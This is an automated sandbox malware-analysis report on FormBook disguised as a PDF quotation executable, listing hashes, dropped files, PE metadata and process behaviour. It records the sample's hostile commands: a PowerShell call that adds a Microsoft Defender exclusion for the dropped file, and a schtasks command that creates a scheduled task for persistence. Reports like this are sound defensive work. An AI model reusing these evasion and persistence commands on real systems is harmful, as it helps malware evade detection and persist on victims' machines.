                              http://www.zhongyicts.com.cnQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sakkal.comQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                No contacted IP infos

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:563220
                                Start date:31.01.2022
                                Start time:12:05:21
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 8s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:QUOTATION PDF_SCAN_COPY.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@14/8@0/0
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 24.8% (good quality ratio 22.2%)
                                • Quality average: 70.6%
                                • Quality standard deviation: 32.7%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 65
                                • Number of non-executed functions: 133
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.5.88, 13.107.42.16, 23.211.5.146, 23.211.6.115, 204.79.197.200, 13.107.21.200
                                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, e12564.dspb.akamaiedge.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com, www.bing.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, l-0007.config.skype.com, store-images.s-microsoft.com, e16646.dscg.akamaiedge.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                12:06:45API Interceptor1x Sleep call for process: QUOTATION PDF_SCAN_COPY.exe modified
                                12:06:51API Interceptor41x Sleep call for process: powershell.exe modified
                                12:08:14API Interceptor63x Sleep call for process: explorer.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION PDF_SCAN_COPY.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22332
                                Entropy (8bit):5.601661528735134
                                Encrypted:false
                                SSDEEP:384:vtCDXbqBT0BQ+KSBKncjultIK77Y9gBSJ3x6T1MaDZlbAV7/ApsSZBDI+5zg:TBABw4KcCltlfBc4CifwjUV8
                                MD5:147498DB6C549710962BB6C1304E855E
                                SHA1:7E5441D88801C466BC4A037E50D47D499BBA4EC9
                                SHA-256:858A4B512D4D9DF5E6A33FC26E8252C55BD267AF3BD56CE0781F3DBE4A773767
                                SHA-512:03C9D68D58506BFC635BF56AA3A9636E659F351D677A6304D1E4A3FD453010BC8FE66930028C9AE0CA523D6AADAAC19A5E2D51CFEAA273FD10251813E98EDF6F
                                Malicious:false
                                Preview:@...e...................h.a...........n...I..........@..........H...............<@.^.L."My...:X..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0flfqeem.c1z.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0feqvz4.jvk.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp

                                Download File
                                Process:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1594
                                Entropy (8bit):5.138464141834504
                                Encrypted:false
                                SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaFxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTUv
                                MD5:AA21016D90C92A78024FA66167B4D7BE
                                SHA1:97BF86E124F859760C7F463BEBF1A3E4FDDBE7D2
                                SHA-256:4F335E7DCD45F9C9295CA77E3071616BB592079059D0B0C93B474A20418C25BE
                                SHA-512:8D7D7A4E5924B556044CAE4035758912071A9D9229B4FB8914BA246EFAC1B33F0F88296FFEEC335F3053A14AB0DF9BD6650D0353487B9D01B1E25D31B1B69517
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                C:\Users\user\AppData\Roaming\KHDScDG.exe

                                Download File
                                Process:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):535552
                                Entropy (8bit):7.39580217020087
                                Encrypted:false
                                SSDEEP:12288:KcqT+JVO7JUQ1h1038w3pym2sdklRwCk3:KcqcVOV3h103s0waH
                                MD5:5E9AF5B2056E4DA639A9459E3B36193C
                                SHA1:B779402E9A6ECBBEF6B68817814991BBCADE12DF
                                SHA-256:35147128936C2E79548E5C0A2BBD70CD5A29C1B01DFA1AC2515FA5BECB7EFA6D
                                SHA-512:4F293BAB428AEEAD9C4B0A411A9D0674BEBD87CF89D92F2AA0B1FFC4D287D96B859365453F21040ABC7B5DD4F452F52ED98661B8C16624D9915D4C40ECFE15EA
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Metadefender, Detection: 29%, Browse
                                • Antivirus: ReversingLabs, Detection: 33%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....v.a..............0.."..........2A... ...`....@.. ....................................@..................................@..O....`...............................?............................................... ............... ..H............text...8!... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................A......H...........,|...............0............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(........(.......(.......(........(........(........(.....*..0...........r...p...(....r...p(.......(....r...p(......r...p(.......(....o.....+...(........o....r...p(........(....-...........o.......r'..p(.......(....o.....+V..(.........>...%...%.rE..p.%...o..............o ....%.rQ..p.%...o.....%.r...p.(!

                                C:\Users\user\AppData\Roaming\KHDScDG.exe:Zone.Identifier

                                Download File
                                Process:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0

                                C:\Users\user\Documents\20220131\PowerShell_transcript.320946.ooSQevcZ.20220131120650.txt

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5777
                                Entropy (8bit):5.396346341966378
                                Encrypted:false
                                SSDEEP:96:BZqjONEUqDo1Z0TZBjONEUqDo1ZsqcSjZ4AjONEUqDo1ZNPCC8ZX:4XZGf
                                MD5:05E8711C62306DB9A0825BBF92E3E028
                                SHA1:791C41350092092FA293623F35C70CD0B97EEC59
                                SHA-256:206403375AA38891911139183B7C118D025435E764A968E8114BA90646B34E9C
                                SHA-512:4BCBA560C830AB19A6E6E78D0AFFD0AE28EFBE2006421824FD27A2EBA774DA5B3F634875C0A94BBEA4D19EF26C6DD93318A2062C2DB25554B800C80301A7D3CA
                                Malicious:false
                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220131120651..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\KHDScDG.exe..Process ID: 4128..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220131120651..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\KHDScDG.exe..**********************..Windows PowerShell transcript start..Start time: 20220131121105..Username: computer\user..RunAs User: computer\user..Con

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.39580217020087
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:QUOTATION PDF_SCAN_COPY.exe
                                File size:535552
                                MD5:5e9af5b2056e4da639a9459e3b36193c
                                SHA1:b779402e9a6ecbbef6b68817814991bbcade12df
                                SHA256:35147128936c2e79548e5c0a2bbd70cd5a29c1b01dfa1ac2515fa5becb7efa6d
                                SHA512:4f293bab428aeead9c4b0a411a9d0674bebd87cf89d92f2aa0b1ffc4d287d96b859365453f21040abc7b5dd4f452f52ed98661b8c16624d9915d4c40ecfe15ea
                                SSDEEP:12288:KcqT+JVO7JUQ1h1038w3pym2sdklRwCk3:KcqcVOV3h103s0waH
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....v.a..............0.."..........2A... ...`....@.. ....................................@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x484132
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x61F77617 [Mon Jan 31 05:39:35 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x840e00x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x5e4.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x83fa80x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x821380x82200False0.755804965178data7.40361532396IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x860000x5e40x600False0.435546875data4.17670383408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x880000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x860900x352data
                                RT_MANIFEST0x863f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyright2010 Honda Fit
                                Assembly Version12.1.9.0
                                InternalNameRegist.exe
                                FileVersion12.0.0.0
                                CompanyNameHonda
                                LegalTrademarks
                                CommentsBorders Books
                                ProductNameLineNumberInfo
                                ProductVersion12.0.0.0
                                FileDescriptionLineNumberInfo
                                OriginalFilenameRegist.exe

                                Network Behavior

                                No network behavior found

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:1
                                Start time:12:06:19
                                Start date:31/01/2022
                                Path:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"
                                Imagebase:0x770000
                                File size:535552 bytes
                                MD5 hash:5E9AF5B2056E4DA639A9459E3B36193C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Target ID:7
                                Start time:12:06:48
                                Start date:31/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe
                                Imagebase:0x1360000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                General

                                Target ID:8
                                Start time:12:06:49
                                Start date:31/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6eb840000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:9
                                Start time:12:06:49
                                Start date:31/01/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp
                                Imagebase:0x10a0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:10
                                Start time:12:06:50
                                Start date:31/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:11
                                Start time:12:06:51
                                Start date:31/01/2022
                                Path:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
                                Imagebase:0x5a0000
                                File size:535552 bytes
                                MD5 hash:5E9AF5B2056E4DA639A9459E3B36193C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
